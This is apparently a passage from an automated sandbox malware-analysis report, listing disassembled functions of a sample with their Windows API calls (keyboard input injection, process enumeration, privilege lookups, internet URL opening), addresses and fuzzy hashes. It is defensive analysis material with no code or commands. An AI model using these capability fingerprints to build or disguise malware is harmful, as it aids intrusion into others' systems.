socket.WSOCK32(00000002,00000002,00000011), ref: 00F069D1
WSAGetLastError.WSOCK32(00000000), ref: 00F069E1

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F06A45
WSAGetLastError.WSOCK32(00000000), ref: 00F06A51

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 09ec9306363f998db5815b292b65b2a022b92b35360bbf5343f45eda33026277
Instruction ID: d5a98db432f0d82c7330684ae22f01c3716ae17d8eb7198297609d5249a47bcc
Opcode Fuzzy Hash: 09ec9306363f998db5815b292b65b2a022b92b35360bbf5343f45eda33026277
Instruction Fuzzy Hash: C6418C75740200AFEB60AF68CC86F7A77E89B05B14F04941CFA19EB3D3DAB59D009B91

Function 00F0641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F1F910), ref: 00F064A7
_strlen.LIBCMT ref: 00F064D9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 5be4d9bf99de690cb618233718de92276e00fe250247107b4d548b832e7aae3a
Instruction ID: f29d6810845ee3e2e1fc8aa15562e89c333b6c721454d007ea90377dae506469
Opcode Fuzzy Hash: 5be4d9bf99de690cb618233718de92276e00fe250247107b4d548b832e7aae3a
Instruction Fuzzy Hash: A1417575A00104ABCF14EBA8DC96FBEB7E9AF44320F148159F815EB2D2DB30AD14E750

Function 00EFB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EFB89E
GetLastError.KERNEL32(?,00000000), ref: 00EFB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EFB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EFB915

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 395bb6895f3319ccc98d06f88d798b85287a555093720a1a99b8f52bb4cb5d2f
Instruction ID: 3cd1532cba8460eaea61b9d3b3ee43b4ba8e88cf10f0d993d8f5562105e13d08
Opcode Fuzzy Hash: 395bb6895f3319ccc98d06f88d798b85287a555093720a1a99b8f52bb4cb5d2f
Instruction Fuzzy Hash: A6413A39600554DFCF24EF18C485A69BBE5AF89314F099098ED4AAB362DB30FD01DB91

Function 00F18851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F188DE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 1dabeb256c18280d1aa3e303d98bc227afacaa23e1219f36a8410aa03c1b673d
Instruction ID: cbd400fd749d05c8a844c1d50e120816de12c1b16883dd30d7c2bc985461112f
Opcode Fuzzy Hash: 1dabeb256c18280d1aa3e303d98bc227afacaa23e1219f36a8410aa03c1b673d
Instruction Fuzzy Hash: DD31E834A40108BFEF209B58CD45BF877A5EB057B0FD44111FA11E61A1CE31E9C2BB52

Function 00F1AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00F1AB60
GetWindowRect.USER32(?,?), ref: 00F1ABD6
PtInRect.USER32(?,?,00F1C014), ref: 00F1ABE6
MessageBeep.USER32(00000000), ref: 00F1AC57

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 978e1f52648912625eafc39fcc65122923f6deb364dac2620569ec93b005bda9
Instruction ID: e2e20510c251394489a7b183911318f9796e578ba5ddfd2b8e626f9e7fe94ef0
Opcode Fuzzy Hash: 978e1f52648912625eafc39fcc65122923f6deb364dac2620569ec93b005bda9
Instruction Fuzzy Hash: E3418E30A01219DFCB11DF58C894BE97BF6FB49721F1880A9E915DB364D730E881EB92

Function 00EF0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EF0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00EF0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EF0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EF0BFB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c451b4855ef79a690af42e3935b03b0e1cc18d70a2c2885f1154b26b6a79f387
Instruction ID: 8d29b8d28b58ea82a47ccbf2f754ab046933bbd4aa8b51ba2439cd3715725d0d
Opcode Fuzzy Hash: c451b4855ef79a690af42e3935b03b0e1cc18d70a2c2885f1154b26b6a79f387
Instruction Fuzzy Hash: 66315A70E4021CAEFF308B258C05BFABBA6AB4532CF08925AF681721D3C3748D449751

Function 00EF0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00EF0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00EF0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00EF0CE1
SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00EF0D33

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 157ae9f60fbdebf95ee0c0850a485481837f21c1bc819ffcc2b75fa3bab9b28d
Instruction ID: c2dff6655f7a84101306ee1e64ba37fcf12df4cf82230efacd7615af323adc53
Opcode Fuzzy Hash: 157ae9f60fbdebf95ee0c0850a485481837f21c1bc819ffcc2b75fa3bab9b28d
Instruction Fuzzy Hash: C4315830A0021CAFFF308B658C147FEFBA6AB45328F18A75AE695721D3C3359945D751

Function 00EC61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EC61FB
__isleadbyte_l.LIBCMT ref: 00EC6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EC6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EC628D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3ae3fcb6bbbd70530ff8dee10df4f81cee7bcbd122a40ba430387774ce78adc0
Instruction ID: b9120d838c67c51c7d10736a015f48c652dbeb49b7669611adc058c6c20261bd
Opcode Fuzzy Hash: 3ae3fcb6bbbd70530ff8dee10df4f81cee7bcbd122a40ba430387774ce78adc0
Instruction Fuzzy Hash: 4B31CD30604246AFDF258F65CE48FAB7BA9FF41314F15502CE864A71A1EB32E952DB90

Function 00F14EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F14F02

Part of subcall function 00EF3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EF365B
Part of subcall function 00EF3641: GetCurrentThreadId.KERNEL32 ref: 00EF3662
Part of subcall function 00EF3641: AttachThreadInput.USER32(00000000,?,00EF5005), ref: 00EF3669

GetCaretPos.USER32(?), ref: 00F14F13
ClientToScreen.USER32(00000000,?), ref: 00F14F4E
GetForegroundWindow.USER32 ref: 00F14F54

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 288f94b85492a2766f11ec51af12f5f699c8bf65d85a3640e24b8d6e43b58bfa
Instruction ID: 3f96e20165c290ef8542e787582c32b7ac5bc3a8dee78a32507cd3bde6af5728
Opcode Fuzzy Hash: 288f94b85492a2766f11ec51af12f5f699c8bf65d85a3640e24b8d6e43b58bfa
Instruction Fuzzy Hash: 98312D71D00108AFCB10EFB9C8859EFB7F9EF99300F11406AE415E7252EA75AE458BA0

Function 00EF3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00EF3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00EF3C88
Process32NextW.KERNEL32(00000000,?), ref: 00EF3CA8
CloseHandle.KERNEL32(00000000), ref: 00EF3D52

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a7cbbdf0682354028112ccc235173a6d37a82efcbecdca4de83aae5bc02f118c
Instruction ID: 683a77dbd08be8ee9a187643b0867898fd1ef7832b4859b3ae966dcf63783d86
Opcode Fuzzy Hash: a7cbbdf0682354028112ccc235173a6d37a82efcbecdca4de83aae5bc02f118c
Instruction Fuzzy Hash: 6231DF711083099FD704EF60C881ABFBBE8EFD5354F50182DF592A61A1EB719A4DCB92

Function 00F1C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

GetCursorPos.USER32(?), ref: 00F1C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ECB9AB,?,?,?,?,?), ref: 00F1C4E7
GetCursorPos.USER32(?), ref: 00F1C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ECB9AB,?,?,?), ref: 00F1C56E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 00c0d61d425a1de8326e65f89044660c5fd36f9146b6c836bcec0e3d5818a0d1
Instruction ID: dcb01af312e45ddf5a6c6d2f8c19db13fa0487d8200c6618f0840e0d48cac6e1
Opcode Fuzzy Hash: 00c0d61d425a1de8326e65f89044660c5fd36f9146b6c836bcec0e3d5818a0d1
Instruction Fuzzy Hash: FE319135A00518AFCF15CF58D858EEA7BB6EB09721F484069F9058B261C731AD90EFE4

Function 00EE8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EE8121
Part of subcall function 00EE810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EE812B
Part of subcall function 00EE810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EE813A
Part of subcall function 00EE810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EE8141
Part of subcall function 00EE810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EE8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EE86A3
_memcmp.LIBCMT ref: 00EE86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EE86FC
HeapFree.KERNEL32(00000000), ref: 00EE8703

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4f2ecb4787af2a20ee3cabcd87a420650852afa9aec247fbe7bf4d599af61ae7
Instruction ID: 5e1958ce1d8769bc3f8e0e85c38809b013e64c933e046d2342860c238703f5cf
Opcode Fuzzy Hash: 4f2ecb4787af2a20ee3cabcd87a420650852afa9aec247fbe7bf4d599af61ae7
Instruction Fuzzy Hash: 2F215771E40149EBDB10DFA5CA49BEEB7B8EF44318F158059E848BB241EB30AE05DB90

Function 00EB098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00EB09AE

Part of subcall function 00E95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EF7896,?,?,00000000), ref: 00E95A2C
Part of subcall function 00E95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EF7896,?,?,00000000,?,?), ref: 00E95A50

_fprintf.LIBCMT ref: 00EB09E5
OutputDebugStringW.KERNEL32(?), ref: 00EE5DBB

Part of subcall function 00EB4AAA: _flsall.LIBCMT ref: 00EB4AC3

__setmode.LIBCMT ref: 00EB0A1A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 376bfe25a6ee6dbe7ee7efcdb2ceed35440ff59b3b0a4426b29fd5f5f6087ee4
Instruction ID: 8c18298a6a3b37d37a57e70f1bf459f9e2dfa866c2696fb41b804c515d356297
Opcode Fuzzy Hash: 376bfe25a6ee6dbe7ee7efcdb2ceed35440ff59b3b0a4426b29fd5f5f6087ee4
Instruction Fuzzy Hash: 9D113AB25046086FDB04B3B8AC479FF77E89F91320F10216AF104771C3EE70584697A5

Function 00F01767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F017A3

Part of subcall function 00F0182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F0184C
Part of subcall function 00F0182D: InternetCloseHandle.WININET(00000000), ref: 00F018E9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 6b7d5b7255283cf0e8fb148b5ab87d9607054e4da3af5f54914df4b1bdc1fe78
Instruction ID: a38936be5b2357d5b8744dda6667745efd5fb478330126cd4e137a862bca38de
Opcode Fuzzy Hash: 6b7d5b7255283cf0e8fb148b5ab87d9607054e4da3af5f54914df4b1bdc1fe78
Instruction Fuzzy Hash: 6C21A136600605BFEB129F60DC01FBABBE9FF48B10F14802AFA15966D1DB759911B7A0

Function 00EF3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00F1FAC0), ref: 00EF3A64
GetLastError.KERNEL32 ref: 00EF3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00EF3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F1FAC0), ref: 00EF3ADF

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 095eca76f7f7d4b24cc40662ef2f60d8a5134714d2b3f64ccf2aa3dbb0bfbaa1
Instruction ID: e5ac207b7c28ecca804a53d4ae648e2024d3c06cd14928d11e281b9d5fff235d
Opcode Fuzzy Hash: 095eca76f7f7d4b24cc40662ef2f60d8a5134714d2b3f64ccf2aa3dbb0bfbaa1
Instruction Fuzzy Hash: 2721D3741086098F8710DF39C8818BAB7E4AE55368F105A2EF4E9E72A1D731DE49CB42

Function 00EEDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EEF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EEDCD3,?,?,?,00EEEAC6,00000000,000000EF,00000119,?,?), ref: 00EEF0CB
Part of subcall function 00EEF0BC: lstrcpyW.KERNEL32(00000000,?,?,00EEDCD3,?,?,?,00EEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00EEF0F1
Part of subcall function 00EEF0BC: lstrcmpiW.KERNEL32(00000000,?,00EEDCD3,?,?,?,00EEEAC6,00000000,000000EF,00000119,?,?), ref: 00EEF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00EEDCEC
lstrcpyW.KERNEL32(00000000,?,?,00EEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00EEDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00EEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00EEDD46

Strings

cdecl, xrefs: 00EEDD3D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 7cc7161c948937cc876ceb20fb8cc47e2465985e8575a82756560f1b49d4690f
Instruction ID: f8db33d4a1fbab8efa9b818b1660f37c114b241e8902afb16520eb3b8b02755b
Opcode Fuzzy Hash: 7cc7161c948937cc876ceb20fb8cc47e2465985e8575a82756560f1b49d4690f
Instruction Fuzzy Hash: C111D03A204349EFCB25AF35DC45DBA77A8FF45350B40A12AF806DB2A0EB71E850D791

Function 00EC50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00EC5101

Part of subcall function 00EB571C: __FF_MSGBANNER.LIBCMT ref: 00EB5733
Part of subcall function 00EB571C: __NMSG_WRITE.LIBCMT ref: 00EB573A
Part of subcall function 00EB571C: RtlAllocateHeap.NTDLL(017F0000,00000000,00000001,00000000,?,?,?,00EB0DD3,?), ref: 00EB575F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
